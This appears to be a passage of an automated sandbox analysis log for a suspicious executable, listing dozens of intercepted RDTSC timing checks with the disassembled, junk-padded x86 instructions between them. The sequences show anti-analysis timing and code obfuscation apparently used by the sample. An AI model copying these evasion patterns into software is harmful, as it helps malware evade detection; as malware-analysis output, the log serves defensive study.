Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0D0E second address: 6DB0D58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 pushfd 0x00000006 jmp 00007F8E2D690EF0h 0x0000000b jmp 00007F8E2D690EF5h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F8E2D690EF3h 0x0000001d pop eax 0x0000001e mov cl, bl 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0D58 second address: 6DB0D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0E12 second address: 6DB0E5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007F8E2D690EEEh 0x00000010 js 00007F8E9CB1F756h 0x00000016 jmp 00007F8E2D690EF0h 0x0000001b mov eax, dword ptr [ebp-14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0E5E second address: 6DB0E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0E7B second address: 6DB0EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8E2D690EEDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0EA1 second address: 6DB0ED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, FC52h 0x00000007 call 00007F8E2D68FC63h 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esi+0Ch], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8E2D68FC62h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0ED6 second address: 6DB0EE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D690EEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0EE8 second address: 6DB0F0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, 762C06ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F8E2D68FC5Bh 0x00000018 push esi 0x00000019 pop edi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0F0F second address: 6DB0F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F8E2D690EF7h 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 jmp 00007F8E2D690EF6h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8E2D690EF7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB0F75 second address: 6DB1030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F8E2D68FC5Eh 0x00000010 jne 00007F8E9CB1E390h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F8E2D68FC5Eh 0x0000001d sub cl, FFFFFFD8h 0x00000020 jmp 00007F8E2D68FC5Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F8E2D68FC68h 0x0000002c and ah, 00000038h 0x0000002f jmp 00007F8E2D68FC5Bh 0x00000034 popfd 0x00000035 popad 0x00000036 mov edx, dword ptr [ebp+08h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push edi 0x0000003d pop esi 0x0000003e pushfd 0x0000003f jmp 00007F8E2D68FC67h 0x00000044 xor ax, 80AEh 0x00000049 jmp 00007F8E2D68FC69h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1030 second address: 6DB1036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1036 second address: 6DB103A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB103A second address: 6DB105F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a pushad 0x0000000b jmp 00007F8E2D690EF0h 0x00000010 popad 0x00000011 mov dword ptr [edx], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov si, 4DB3h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB11B5 second address: 6DB11D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F8E2D68FC69h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB11D4 second address: 6DB1209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E2D690EECh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+18h], eax 0x0000000e jmp 00007F8E2D690EF7h 0x00000013 mov eax, dword ptr [esi+1Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1209 second address: 6DB120D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB120D second address: 6DB1213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1213 second address: 6DB1254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8E2D68FC68h 0x00000008 pop eax 0x00000009 mov bx, D176h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [edx+1Ch], eax 0x00000013 pushad 0x00000014 mov eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 call 00007F8E2D68FC65h 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1254 second address: 6DB12BC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8E2D690EF1h 0x00000008 sbb ecx, 01A60D86h 0x0000000e jmp 00007F8E2D690EF1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+20h] 0x0000001a jmp 00007F8E2D690EEEh 0x0000001f mov dword ptr [edx+20h], eax 0x00000022 pushad 0x00000023 movsx edi, cx 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+24h] 0x0000002a jmp 00007F8E2D690EF4h 0x0000002f mov dword ptr [edx+24h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov esi, ebx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB12BC second address: 6DB1350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8E2D68FC5Bh 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esi+28h] 0x00000011 jmp 00007F8E2D68FC65h 0x00000016 mov dword ptr [edx+28h], eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F8E2D68FC5Ch 0x00000020 and eax, 6C363748h 0x00000026 jmp 00007F8E2D68FC5Bh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F8E2D68FC68h 0x00000032 or si, F9A8h 0x00000037 jmp 00007F8E2D68FC5Bh 0x0000003c popfd 0x0000003d popad 0x0000003e mov ecx, dword ptr [esi+2Ch] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F8E2D68FC65h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1350 second address: 6DB136D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB136D second address: 6DB13A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F8E2D68FC69h 0x0000000a and ax, 8DD6h 0x0000000f jmp 00007F8E2D68FC61h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB13A3 second address: 6DB142B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d jmp 00007F8E2D690EEEh 0x00000012 mov word ptr [edx+30h], ax 0x00000016 jmp 00007F8E2D690EF0h 0x0000001b mov ax, word ptr [esi+32h] 0x0000001f pushad 0x00000020 mov edi, eax 0x00000022 pushfd 0x00000023 jmp 00007F8E2D690EEAh 0x00000028 sub ah, FFFFFF88h 0x0000002b jmp 00007F8E2D690EEBh 0x00000030 popfd 0x00000031 popad 0x00000032 mov word ptr [edx+32h], ax 0x00000036 jmp 00007F8E2D690EF6h 0x0000003b mov eax, dword ptr [esi+34h] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F8E2D690EEAh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB142B second address: 6DB1431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1431 second address: 6DB148C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c jmp 00007F8E2D690EF0h 0x00000011 test ecx, 00000700h 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F8E2D690EEEh 0x0000001e sub esi, 483DCCA8h 0x00000024 jmp 00007F8E2D690EEBh 0x00000029 popfd 0x0000002a mov ebx, eax 0x0000002c popad 0x0000002d jne 00007F8E9CB1F17Ch 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB148C second address: 6DB1490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1490 second address: 6DB1522 instructions: 0x00000000 rdtsc 0x00000002 mov ax, DA33h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F8E2D690EF8h 0x0000000e sbb cl, 00000038h 0x00000011 jmp 00007F8E2D690EEBh 0x00000016 popfd 0x00000017 popad 0x00000018 or dword ptr [edx+38h], FFFFFFFFh 0x0000001c pushad 0x0000001d mov di, si 0x00000020 mov bh, ch 0x00000022 popad 0x00000023 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F8E2D690EF4h 0x00000030 sub al, FFFFFFC8h 0x00000033 jmp 00007F8E2D690EEBh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F8E2D690EF8h 0x0000003f adc ax, B628h 0x00000044 jmp 00007F8E2D690EEBh 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB1522 second address: 6DB153A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DB153A second address: 6DB1559 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+40h], FFFFFFFFh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop esi 0x00000014 mov dx, 4282h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E00BFF second address: 6E00C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E00C05 second address: 6E00C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8E2D690EF4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F8E2D690EF0h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F8E2D690EF0h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov dl, 9Ch 0x00000023 jmp 00007F8E2D690EF6h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0855 second address: 6DA085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA085B second address: 6DA085F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA085F second address: 6DA0863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0863 second address: 6DA08AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F8E2D690EEAh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 call 00007F8E2D690EEEh 0x00000018 mov ecx, 0F8DDB91h 0x0000001d pop ecx 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F8E2D690EF5h 0x00000028 mov bx, si 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D40729 second address: 6D4072F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D4072F second address: 6D40733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D40B17 second address: 6D40B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8E2D68FC66h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, 50h 0x00000015 mov eax, edi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D40B46 second address: 6D40B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D40B4B second address: 6D40B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8E2D68FC68h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8E2D68FC67h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D90AAF second address: 6D90AC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D90AC2 second address: 6D90AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D90AE7 second address: 6D90AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D90AEB second address: 6D90AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70058 second address: 6D7005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D7005E second address: 6D70062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70062 second address: 6D70082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8E2D690EF5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70082 second address: 6D700A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, 75244E00h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8E2D68FC61h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D700A5 second address: 6D700AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D700AB second address: 6D70112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8E2D68FC60h 0x00000010 and esp, FFFFFFF0h 0x00000013 pushad 0x00000014 jmp 00007F8E2D68FC5Eh 0x00000019 pushfd 0x0000001a jmp 00007F8E2D68FC62h 0x0000001f and cx, F108h 0x00000024 jmp 00007F8E2D68FC5Bh 0x00000029 popfd 0x0000002a popad 0x0000002b sub esp, 44h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov si, bx 0x00000034 mov dx, A702h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70112 second address: 6D70167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 call 00007F8E2D690EF2h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F8E2D690EF3h 0x00000019 add ch, 0000005Eh 0x0000001c jmp 00007F8E2D690EF9h 0x00000021 popfd 0x00000022 mov dx, ax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70167 second address: 6D70183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70183 second address: 6D70187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70187 second address: 6D701D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8E2D68FC68h 0x00000014 sub si, FCE8h 0x00000019 jmp 00007F8E2D68FC5Bh 0x0000001e popfd 0x0000001f call 00007F8E2D68FC68h 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D701D9 second address: 6D70212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8E2D690EF4h 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F8E2D690EF0h 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov eax, ebx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70212 second address: 6D702B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c mov di, si 0x0000000f pop eax 0x00000010 push edx 0x00000011 mov ax, 858Bh 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 jmp 00007F8E2D68FC67h 0x0000001d mov edi, dword ptr [ebp+08h] 0x00000020 pushad 0x00000021 push edx 0x00000022 mov ecx, 2B7F5E9Dh 0x00000027 pop esi 0x00000028 popad 0x00000029 mov dword ptr [esp+24h], 00000000h 0x00000031 jmp 00007F8E2D68FC69h 0x00000036 lock bts dword ptr [edi], 00000000h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov esi, edx 0x00000040 pushfd 0x00000041 jmp 00007F8E2D68FC5Fh 0x00000046 and ah, 0000006Eh 0x00000049 jmp 00007F8E2D68FC69h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D702B5 second address: 6D702F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F8E9DC7304Fh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8E2D690EECh 0x00000016 add cx, 0318h 0x0000001b jmp 00007F8E2D690EEBh 0x00000020 popfd 0x00000021 movzx eax, bx 0x00000024 popad 0x00000025 pop edi 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D702F9 second address: 6D702FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D702FD second address: 6D7036E instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, dx 0x0000000a popad 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8E2D690EF7h 0x00000013 adc eax, 082F453Eh 0x00000019 jmp 00007F8E2D690EF9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F8E2D690EF0h 0x00000025 xor cl, 00000038h 0x00000028 jmp 00007F8E2D690EEBh 0x0000002d popfd 0x0000002e popad 0x0000002f pop ebx 0x00000030 pushad 0x00000031 mov ax, C48Bh 0x00000035 push eax 0x00000036 push edx 0x00000037 mov di, ax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D7036E second address: 6D7038D instructions: 0x00000000 rdtsc 0x00000002 mov ax, AFB9h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, bx 0x00000011 jmp 00007F8E2D68FC5Dh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D7038D second address: 6D7039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D690EECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D7039D second address: 6D703A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0910 second address: 6DA0920 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 59C6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0920 second address: 6DA0939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
